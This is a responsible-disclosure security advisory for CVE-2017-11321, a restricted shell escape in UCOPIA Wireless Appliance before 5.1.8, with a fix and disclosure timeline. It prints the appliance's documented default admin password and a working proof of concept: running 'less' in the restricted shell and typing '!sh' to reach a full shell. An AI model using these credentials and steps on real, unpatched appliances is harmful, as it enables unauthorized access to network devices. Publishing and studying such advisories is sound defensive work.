# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape

## Asset Description

UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.

More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.

The affected asset in this report is a WiFi management appliance.


## Vulnerability

Shell Escape via `less` command.

**Threat**

Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.

**CVE ID**: CVE-2017-11321

**Access Vector**: network

**Security Risk**: critical

**Vulnerability**: CWE-78

**CVSS Base Score**: 9.1 (Critical)

**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

### Proof of Concept: Restricted Shell Escape

By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).

A documented **admin** user exists on the system with the password **bhu85tgb**.

Quoted from the documentation :

> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
the following username and password: admin/bhu85tgb, and then execute the interface command.

By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.

However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.

Steps :

**1/** Login to the appliance using SSH or ShellInTheBox.

**2/** Run the `less /etc/passwd` command.

**3/** When viewing the file, type `!sh`

**4/** You now have unrestricted `admin` user access to the appliance.

```
> less /etc/passwd
!sh
$ ls /
bin dev etc home lib proc tmp user
$ whoami
admin
```

## Solution

Update to UCOPIA 5.1.8

## Timeline (dd/mm/yyyy)

* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.

## Credits

* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream